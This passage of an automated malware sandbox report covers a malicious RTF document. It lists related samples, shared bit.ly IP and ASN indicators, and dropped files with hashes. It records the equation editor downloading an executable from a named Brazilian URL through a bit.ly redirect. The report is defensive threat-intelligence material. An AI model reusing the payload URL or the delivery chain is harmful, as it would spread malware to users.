                                                                                                                                          • bit.ly/3qv6mbc
                                                                                                                                          PO_60577.docGet hashmaliciousBrowse
                                                                                                                                          • bit.ly/3sjh7PM

                                                                                                                                          Domains

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          bit.lyIMG_155710.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_761213.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_4785.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG-51033.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_688031.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_68103.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          DRAWING_22719.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          FedEx 77258441873.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_651023.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_112237.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_75513.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_03991.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          New Profit Distribution.pdf.lnkGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          CN-2nd Reminder-XXXXX1894--02072020073335073781.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_15506.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_167749.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          RFQSDCL1005C1N5STDFM01.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          INVOICES & STATEMENTS_02201.htmGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          file.rtfGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          Contract Documents IMG_15603.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11

                                                                                                                                          ASN

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          GOOGLE-PRIVATE-CLOUDUSIMG_155710.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_761213.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_4785.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG-51033.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_688031.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_68103.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          DRAWING_22719.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          FedEx 77258441873.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_651023.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_112237.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_75513.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_03991.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          New Profit Distribution.pdf.lnkGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          CN-2nd Reminder-XXXXX1894--02072020073335073781.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          IMG_15506.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          IMG_167749.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.10
                                                                                                                                          RFQSDCL1005C1N5STDFM01.docGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          INVOICES & STATEMENTS_02201.htmGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          Enquiry 2021.pptGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.16
                                                                                                                                          file.rtfGet hashmaliciousBrowse
                                                                                                                                          • 67.199.248.11
                                                                                                                                          MandicSABRhttp://gruposuporte.com.br/#9053pl500@cez.czGet hashmaliciousBrowse
                                                                                                                                          • 177.70.106.24
                                                                                                                                          27Label_00384463.doc.jsGet hashmaliciousBrowse
                                                                                                                                          • 177.70.106.102
                                                                                                                                          27Label_00384463.doc.jsGet hashmaliciousBrowse
                                                                                                                                          • 177.70.106.102

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          No context

                                                                                                                                          Dropped Files

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          C:\Users\user\AppData\Local\Temp\AddInProcess32.exeIMG_155710.docGet hashmaliciousBrowse
                                                                                                                                            IMG_4785.docGet hashmaliciousBrowse
                                                                                                                                              IMG_688031.docGet hashmaliciousBrowse
                                                                                                                                                IMG_010357.docGet hashmaliciousBrowse
                                                                                                                                                  Soa.docGet hashmaliciousBrowse
                                                                                                                                                    IMG_06176.docGet hashmaliciousBrowse
                                                                                                                                                      IMG_50617.docGet hashmaliciousBrowse
                                                                                                                                                        TT Copy.docGet hashmaliciousBrowse
                                                                                                                                                          QL-0217.docGet hashmaliciousBrowse
                                                                                                                                                            RT-05723.docGet hashmaliciousBrowse
                                                                                                                                                              PIO-06711.docGet hashmaliciousBrowse
                                                                                                                                                                PO-JQ1125742021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                  ORDER-45103.xlsGet hashmaliciousBrowse
                                                                                                                                                                    Debt Statement.xlsGet hashmaliciousBrowse
                                                                                                                                                                      SD-1061.xlsGet hashmaliciousBrowse
                                                                                                                                                                        NEW ORDER.xlsGet hashmaliciousBrowse
                                                                                                                                                                          exploit.docGet hashmaliciousBrowse
                                                                                                                                                                            invoice.docGet hashmaliciousBrowse
                                                                                                                                                                              BDO-1218.xlsGet hashmaliciousBrowse
                                                                                                                                                                                BDO-1218.xlsGet hashmaliciousBrowse

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-50230[1].pdf
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):839656
                                                                                                                                                                                  Entropy (8bit):5.8344795183177265
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:yHuICHfNbxpOHOKThJhHZ/ftciJKkEDZMfDnCEBBb8a2ong:yHuIS/OuWhJ/Vh8rCffBAn
                                                                                                                                                                                  MD5:BEB09E991A41577E79DFABC58178A44F
                                                                                                                                                                                  SHA1:88FB38266CF4DBDB6537082E0FCEDC1FF4070F59
                                                                                                                                                                                  SHA-256:80EE728FDCD057C60C2D67DDE0943F6FB227C6F521D98582843E5908E0437FF5
                                                                                                                                                                                  SHA-512:2926EBBAA31478A810B89D0A0B0024D10D405D8C561208838192374D94DF2FCFF78DD1D2BE7C75AEFA4045682DA463E31C2AD3DEE75CF40EAF27FB4CDC72774D
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  IE Cache URL:http://neuromedic.com.br/cgi./IMG-50230.pdf
                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z!.?.................Z...J.......x... ........@.. ....................................`..................................x..S........F...............)........................................................... ............... ..H............text....X... ...Z.................. ..`.rsrc....F.......H...\..............@..@.reloc..............................@..B.................x......H........N...)......G.................................................... :........%.....(......... .........%.....(.........*...0..........r...p(I...u............................(P...t....&.r...p(I...u....(I...u....&.....&............-R(....t....(I...u....-9....(....t................\.(P...t............(P...t....&.+k...............-K..........(P...t.... .ic..... .J..\(P...t............(I...u.............+......................+...................(....t............-......-..
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3iWebUT[1].htm
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):130
                                                                                                                                                                                  Entropy (8bit):4.749463400045454
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:qVvzLURODccZ/vXbvx9nDyiQ1wHZYmJG4rDLMBFSXbKFvNGb:qFzLIeco3XLx92iQ1w5YmJ3XMSLWQb
                                                                                                                                                                                  MD5:FDAFDFDBDC82294D3B8CECC8BCD4B073
                                                                                                                                                                                  SHA1:F1F2FB25A913FB4DC389B342724FD9E850F84518
                                                                                                                                                                                  SHA-256:19F4A633F5BB4288DF736245CA4351E3477A1153214005DCABBDD05C77079738
                                                                                                                                                                                  SHA-512:A53648152465DC2CB609C0B0DFD53A01227385DF8DBC9A0C7B1E57A592645A2DDDFA497C0FC107E5BA672ACF91ED25C91987C53913DF5C9FBF5FD470D226AB21
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview: <html>.<head><title>Bitly</title></head>.<body><a href="http://neuromedic.com.br/cgi./IMG-50230.pdf">moved here</a></body>.</html>
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0863C5D3-5908-4917-8FD7-8909E0160183}.tmp
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2408770
                                                                                                                                                                                  Entropy (8bit):4.149210306759611
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:DWD+rVWDLrWWDLrVsWDLrVWDLrVWDorVWDLr1WDLrhWDLrVWDwr5WDyrVWDLrVWz:peLneteeiFjeaUedo7yeRaevkt20
                                                                                                                                                                                  MD5:CD2CF5CC7FA5B54697E64D78A0D4A3D0
                                                                                                                                                                                  SHA1:0CB24717E650EBE77C345ACE87E5ABB0AC38C3DA
                                                                                                                                                                                  SHA-256:949BAFAD3F17FC45F225736E08254CE0BB7911D5D3186D5CBD50C34B8AB816EA
                                                                                                                                                                                  SHA-512:D0A6C47684BCC029E0ADB81889E3E0A9261967588A12F5C78367D87E0164C6C7F43D28CF176CFD806C60A6950E12ED9F1B8C933259997D0FAFECC663EA208742
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview: ..@.Q.G.6.T.Z.C.U.e.f.7.7.h.z.7.v.S.@.-.y.i.R.K.B.Y.9.a.G.n.T.X.9.P.D.q.8.<.e.h.&.&.0._.M.-.D._.g.-.-._.-.d.,.6.4.>.3.6.8.4.5.$.C.v.>.y.t.=.n.5.|.:.%._.>.j.n.6.%.b.m.;.=.u.%.8.9...6.5..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . .
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{248D4A90-30CA-4646-ACFF-79FC9E14ADCB}.tmp
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1024
                                                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C2D3EB9C-AB70-4784-8852-5C03B64EE05D}.tmp
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1536
                                                                                                                                                                                  Entropy (8bit):1.3586208805849453
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbt:IiiiiiiiiifdLloZQc8++lsJe1MzK
                                                                                                                                                                                  MD5:AFC2147AA9F1F702B94C0CBBE6D6AB79
                                                                                                                                                                                  SHA1:D73F6521026883B21BA56D9B2740C030F68E556B
                                                                                                                                                                                  SHA-256:D212226F515BEFDBEA665892274BD17682E3A1CC432CB99485C7B36EF2BE246D
                                                                                                                                                                                  SHA-512:CDD72BC889EF75AAE2E60D0AF5BC8BEF577F3EF754A15A028C5AC4E1D1AAE3E25F53EB3E7D224A8A310D2028502892CADC504E72BAB790D31A5B23E0D2712ADF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                                                                                                                  Process:C:\Users\Public\69577.exe
                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):42176
                                                                                                                                                                                  Entropy (8bit):6.200071124937496
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:/mdeeaAQ7dX6Iq8yFMyRd0lijbEBJoGs:/yejP7dORdS+bEBJoG
                                                                                                                                                                                  MD5:DA55A7AED2F65D6104E1A79EE067CC00
                                                                                                                                                                                  SHA1:B464DB0A153DCA4CC1F301490CD14345C15F5A0A
                                                                                                                                                                                  SHA-256:161BCBF5F7D766B70ACE9CDF7B3B250D256AB601720F09F4183A1FA4F92DCF54
                                                                                                                                                                                  SHA-512:2C33706030A7ABF1B15750B1A89BFD6A7B8D30CD9E83443565C9343DB511AA2CC5C689F24076A557AAEA67EC685DAC5183B6E54ED27224CAE98D2B4455095DA8
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                  • Filename: IMG_155710.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: IMG_4785.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: IMG_688031.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: IMG_010357.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Soa.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: IMG_06176.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: IMG_50617.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: TT Copy.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: QL-0217.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: RT-05723.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: PIO-06711.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: PO-JQ1125742021.xlsx, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: ORDER-45103.xls, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: Debt Statement.xls, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: SD-1061.xls, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: NEW ORDER.xls, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: exploit.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: invoice.doc, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: BDO-1218.xls, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: BDO-1218.xls, Detection: malicious, Browse
                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....W..............0..X..........:w... ........@.. ....................................`..................................v..O....... ............f...>...........u............................................... ............... ..H............text...@W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B.................w......H........#..,Q...................t.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......8...(....o......r...p.o.......4........o......... ........o......s.........o ...s!.....s".......r]..prg..po#.....r...p.o#.....r...pr...po#.........s.........($.....t@...r...p(%...&..r...p.(&...s'.......o(...&..o)....(*...o+.....&...(,....*.......3..@......R...s.....s....(-...*:.(......}P...*J.{P....o/..
                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\IMG-50230.LNK
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 27 13:51:34 2021, length=1332844, window=hide
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2018
                                                                                                                                                                                  Entropy (8bit):4.552369832845401
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:8K/XT3Ikuw/ArsrBnDBQh2K/XT3Ikuw/ArsrBnDBQ/:8K/XLIkurwrNBQh2K/XLIkurwrNBQ/
                                                                                                                                                                                  MD5:22EEDD7B1BAF686ED749EED44E73804E
                                                                                                                                                                                  SHA1:EBC06C36F3EC998C6A3F9EE9DAA4EDABE267D3BF
                                                                                                                                                                                  SHA-256:24959E8063760C6823E04E83C795D9DBB00822BB67EBD3CC546845BA9DB7CE93
                                                                                                                                                                                  SHA-512:B52D7A6EDCBD48EDD84B91DC0A2F080D8567B7DEBADE651DFB5D4C655938047323DBFDDAF2BC13F9A9BE91F073922C6D8260888C90A049C45F16FEAED6AB6D61
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview: L..................F.... .......{......{....K....lV...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2.lV..;Rrv .IMG-50~1.DOC..H.......Q.y.Q.y*...8.....................I.M.G.-.5.0.2.3.0...d.o.c.......w...............-...8...[............?J......C:\Users\..#...................\\927537\Users.user\Desktop\IMG-50230.doc.$.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.M.G.-.5.0.2.3.0...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......927537..........D_....3N...W...9F.C...........[D_....3N...W...9F.C.......
                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):65
                                                                                                                                                                                  Entropy (8bit):4.194563874754362
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:M1JG4FS0Ay4FSmX1JG4FSv:MvEd2
                                                                                                                                                                                  MD5:BB29512164E91CE2515A67BB4C014FAB
                                                                                                                                                                                  SHA1:8BE8083C5F319E4258C243C7F67F61BD0AD551F6
                                                                                                                                                                                  SHA-256:60E1D333875605320E5D548041E50AE8BDACF2E5DC3A39F24B03BF108B31AD6C
                                                                                                                                                                                  SHA-512:20AFE76D3061308C4BA5D1F8414E979F35D3779EC65F96B817B1EEF53EE3BF18168F7E9FF5A418EE25B9572209F29149EDC9D282E23A83F44AEABA561312966B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview: [doc]..IMG-50230.LNK=0..IMG-50230.LNK=0..[doc]..IMG-50230.LNK=0..
                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                  Entropy (8bit):2.431160061181642
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                                                  MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                                                  SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                                                  SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                                                                                                                  SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: ..
                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Y5D8BEZV.txt
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):90
                                                                                                                                                                                  Entropy (8bit):4.31625622510561
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:jvcDcecQRNHoVZIVuv2ci2NPB3V4xFRcw3SSHvn:s6ZIVu+ci2NJ3axFBvn
                                                                                                                                                                                  MD5:4B5D34824217783F9CF0E1D146D4AFA9
                                                                                                                                                                                  SHA1:34CC2B4DD48B11D8019B2990F7C4741EE9293778
                                                                                                                                                                                  SHA-256:AEAE0A8F2B51D947D64AE9BFB899C863D6812BB6F7C3F5DBA0750846A7D958DB
                                                                                                                                                                                  SHA-512:EFD1E904D2CB8B7075498CFA5B35854670D902DC718C7902BEDB50E800029D755E28665A9587E58CE42A3FF148AD9F8768282EF193C7412FE7A11443095CD7EE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:bit.ly/
                                                                                                                                                                                  Preview: _bit.l0r5Pp-3298995411bad0e715-00a.bit.ly/.1536.1156689024.30900706.2028579048.30864572.*.
                                                                                                                                                                                  C:\Users\user\Desktop\~$G-50230.doc
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                  Entropy (8bit):2.431160061181642
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                                                  MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                                                  SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                                                  SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                                                                                                                  SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                                                                                                                  C:\Users\Public\69577.exe
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):839656
                                                                                                                                                                                  Entropy (8bit):5.8344795183177265
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:yHuICHfNbxpOHOKThJhHZ/ftciJKkEDZMfDnCEBBb8a2ong:yHuIS/OuWhJ/Vh8rCffBAn
                                                                                                                                                                                  MD5:BEB09E991A41577E79DFABC58178A44F
                                                                                                                                                                                  SHA1:88FB38266CF4DBDB6537082E0FCEDC1FF4070F59
                                                                                                                                                                                  SHA-256:80EE728FDCD057C60C2D67DDE0943F6FB227C6F521D98582843E5908E0437FF5
                                                                                                                                                                                  SHA-512:2926EBBAA31478A810B89D0A0B0024D10D405D8C561208838192374D94DF2FCFF78DD1D2BE7C75AEFA4045682DA463E31C2AD3DEE75CF40EAF27FB4CDC72774D
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z!.?.................Z...J.......x... ........@.. ....................................`..................................x..S........F...............)........................................................... ............... ..H............text....X... ...Z.................. ..`.rsrc....F.......H...\..............@..@.reloc..............................@..B.................x......H........N...)......G.................................................... :........%.....(......... .........%.....(.........*...0..........r...p(I...u............................(P...t....&.r...p(I...u....(I...u....&.....&............-R(....t....(I...u....-9....(....t................\.(P...t............(P...t....&.+k...............-K..........(P...t.... .ic..... .J..\(P...t............(I...u.............+......................+...................(....t............-......-..

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:Rich Text Format data, unknown version
                                                                                                                                                                                  Entropy (8bit):6.336603431557007
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Rich Text Format (5005/1) 55.56%
